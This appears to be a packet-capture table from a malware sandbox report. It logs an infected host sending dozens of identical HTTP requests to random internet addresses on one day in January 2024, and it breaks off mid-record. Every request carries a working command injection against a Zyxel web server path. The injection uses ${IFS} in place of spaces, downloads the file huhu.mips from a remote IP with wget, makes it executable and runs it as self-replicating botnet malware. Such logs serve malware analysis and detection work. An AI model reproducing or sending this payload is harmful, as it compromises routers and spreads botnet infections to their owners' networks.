                                      Jan 19, 2024 17:29:36.865252018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5561192.168.2.1456382221.50.34.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865293026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5562192.168.2.1433312121.5.204.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865309000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5563192.168.2.1443048122.59.73.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865374088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5564192.168.2.1437460155.219.123.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865406990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5565192.168.2.1447584183.92.67.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865461111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5566192.168.2.145967439.159.5.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865516901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5567192.168.2.1443486109.123.159.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865555048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5568192.168.2.1449644147.94.35.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865590096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5569192.168.2.143371090.216.89.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865622997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5570192.168.2.1439728124.238.123.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865658045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5571192.168.2.1439068187.34.222.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865709066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5572192.168.2.145417059.76.50.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865751982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5573192.168.2.145278241.87.215.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865789890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5574192.168.2.1433912126.216.250.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865835905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5575192.168.2.1438762199.85.80.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865880013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5576192.168.2.144223488.232.180.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865917921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5577192.168.2.144939080.55.168.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865959883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5578192.168.2.143949213.6.202.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.865983009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5579192.168.2.1449256108.121.3.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866029978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5580192.168.2.1441388120.190.2.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866061926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5581192.168.2.145212280.37.79.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866097927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5582192.168.2.14360564.47.88.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866132021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5583192.168.2.143618438.152.69.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866189003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5584192.168.2.145822477.148.198.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866199970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5585192.168.2.143302617.57.108.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866255045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5586192.168.2.1451986168.20.181.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866312981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5587192.168.2.1433490154.181.204.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866332054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5588192.168.2.1438290212.65.167.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866345882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5589192.168.2.1437190125.107.207.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866358042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5590192.168.2.1438596217.217.229.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.866437912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5591192.168.2.144815857.136.220.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869645119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5592192.168.2.145742679.122.191.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869673967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5593192.168.2.14398648.62.202.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869707108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5594192.168.2.143383883.131.51.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869745016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5595192.168.2.1438138198.106.226.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869771957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5596192.168.2.1456980176.162.158.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869810104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5597192.168.2.1454098176.212.72.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869870901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5598192.168.2.1434424171.17.191.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869920969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5599192.168.2.1450290167.33.25.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.869951010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5600192.168.2.145767850.142.103.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878283978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5601192.168.2.144314235.192.111.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878323078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5602192.168.2.144230482.29.62.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878371954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5603192.168.2.1438476166.12.197.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878437042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5604192.168.2.1452836126.130.163.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878470898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5605192.168.2.145420881.204.184.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878509045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5606192.168.2.1446216148.52.199.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878552914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5607192.168.2.1444092201.172.230.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878597975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5608192.168.2.1436184164.22.207.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878638029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5609192.168.2.1456158117.169.132.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878685951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5610192.168.2.1438136102.191.182.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878716946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5611192.168.2.145760437.28.61.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878741026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5612192.168.2.144479293.10.145.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878796101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5613192.168.2.1433228222.197.57.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878823042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5614192.168.2.145796478.106.99.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878860950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5615192.168.2.1451066120.48.16.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878921032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5616192.168.2.145424070.167.127.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.878961086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5617192.168.2.145276262.167.116.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879012108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5618192.168.2.145693897.101.151.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879040956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5619192.168.2.1447220125.247.105.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879105091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5620192.168.2.1457486161.47.160.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879139900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5621192.168.2.1442952167.221.93.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879177094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5622192.168.2.143338027.230.218.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879225016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5623192.168.2.1458864180.138.35.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879257917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5624192.168.2.1433796188.228.189.32443
                                      TimestampBytes transferredDirectionData
